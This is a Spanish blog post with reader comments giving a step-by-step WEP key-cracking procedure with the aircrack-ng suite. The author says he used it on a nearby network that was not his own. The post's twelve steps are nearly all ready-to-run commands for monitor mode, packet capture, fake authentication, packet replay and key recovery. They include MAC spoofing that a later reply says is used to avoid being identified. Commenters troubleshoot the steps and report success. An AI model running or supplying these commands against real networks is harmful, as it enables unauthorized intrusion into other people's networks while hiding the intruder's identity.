La verdad, es que Juanito hace tiempo que me picó con el tema del crackeo de redes inalámbricas. Tampoco le presté mucha más atención que la un simple pique absurdo. Sin embargo el otro día pensé, a ver si es muy difícil esto, y la verdad es que con Ubuntu no puede ser más sencillo.
Evidentemente, yo no lo utilizo para tener red gratis, más que nada por que yo tengo mi red de banda ancha conectada con mi RJ45.
Ahora la conclusión es inmediata, proteger una red inalámbrica con cifrado WEP es como dejar un caramelo en la puerta de un colegio.
Tengo que decir que he tardado menos de 5 minutos (y creo que exagero con el tiempo) en conseguir descifrar la contraseña de una red próxima, y no tengo que exagerar. Así que recomiendo a todos aquellos incautos que tengan la red protegida con WEP que se olviden y se pasen inmediatamente a WPA, o mejor que bloqueen las MAC que pueden acceder a su red.
Los pasos que seguí para hacer esta operación, fueron los siguientes:
1.- Instalé la suite aircrack-ng
sudo apt-get install aircrack-ng2.- Instalé Macchanger
sudo apt-get install macchanger3.- A partir de aquí me desconecté de la red wifi y ejecuté:
sudo airmon-ng start wlan0aquí se puede ver que mon0 está activo
4.- Dí de baja mon0
sudo ifconfig mon0 down5.- Operación enmascarado. Cambié la MAC de nuestra tarjeta de red, por una más molona:
sudo macchanger -m 00:11:22:33:44:55 mon06- Dí nuevamente de alta mon0, pero con su nueva dirección MAC:
sudo ifconfig mon0 up7.- Escaneé las redes que había por la zona
sudo airodump-ng mon0
8.- Cuando encontré una que me gustaba, detuve la búsqueda con Ctrl-C. Para poder descifrar la contraseña, es necesario que la columna «#Data» de la red en cuestión sea distinto de cero, sino es que no hay transmisión de paquetes y no se puede hacer nada.
A partir de este momento, es cuando mi monitor se parece al de Matrix, todo lleno de ventanas negras con letras verdes. Pues a partir de ahora cada instrucción se corre en una nueva ventana.
9.- Abrí otro terminal y ejecuté airodump-ng, con los siguientes parámetros (sustituyendo los datos entre corchetes con los de la red en cuestión):
sudo airodump-ng -c [CH] -w [ESSID] --bssid [BSSID] mon0donde, todos los datos se sacan del punto 7:
CH es el canal
ESSID es el nombre de la red
BSSID es la dirección MAC
10.- Otro terminal, para ejecutar el ataque a la red:
sudo aireplay-ng -1 6000 -a [BSSID] -h 00:11:22:33:44:55 mon0donde:
BSSID es la dirección MAC
11.- Más terminales!!!!:
sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [BSSID] -h 00:11:22:33:44:55 mon0donde:
BSSID es la dirección MAC
12.- Ahora la última terminal, donde se obtiene la clave descifrada:
sudo aircrack-ng -z [ESSID]*.capdonde:
ESSID es el nombre de la red
Una vez ejecuté el último punto se obtiene la clave en formato XX:XX:XX:XX:XX:XX. Ya está terminado, me costó unos segundos. Ya hemos crackeado la red.
La pantalla de Matrix:
Visto lo visto, no se te ocurra utilizar encriptación WEP para tu red, ya has visto lo fácil que es.
tengo un problema y es que el paso 10 me dice que el mon0 está en -1 y no me deja
y otro problema que tengo es que cuando hago el paso 11 me pregunta todo el rato si quiero utilizar ese paquete
me puedes echar una mano?¿
gracias por adelantado 🙂
tengo el mismo problema con el paso 10… ayuda por favor! dice que el canal del mon0 es -1 y no coincide con el canal de la AP… todo comienza en el paso 9. porq a un lado de la fecha sale: » fixed channel mon0: -1
Alguna respuesta a los problemas anteriores ? yo tambien estoy con el mismo problema .. saludos
Hola @a7765bd336fd9b59780e6e3a51f0dd7c:disqus , @ab7f4f352e8ab25cd27921d6c28abe45:disqus y @c9bb095bf1d631476172649a45f7125d:disqus siento no haber contestado antes, pero estoy preparando un nuevo artículo un poco más extenso, desde hace un tiempo. Espero poder contestar en unos pocos días.
Gracias
yo estoy con el mismo problema que nilla, y no encuentro solucion alguna
Mismo problema en el paso 10 que ellos (Spidervicman, nilla…) ¿Cómo se puede solucionar?
pues estando linux beni para que batallar con 2 simples click y listo te dejas detantas cosas yo eh tardado 1 minuto en sacar la contra de las redes
Bueno y que a pasado man ? se hizo el atriculo nuevo o algun cambio referente al problema ? Saludoss !!
Una pregunta, es necesario cambiar el MAC o es posible omitir este paso?
No es necesario, depende de si quieres ser identificado en la red auditada o no.
Saludos
Hola, agradezco grandemente tu post, me oriento de lleno y pude concluir todo a la perfección. En mi caso utilice un adaptador WIFI tipo USB maraca NEXXT.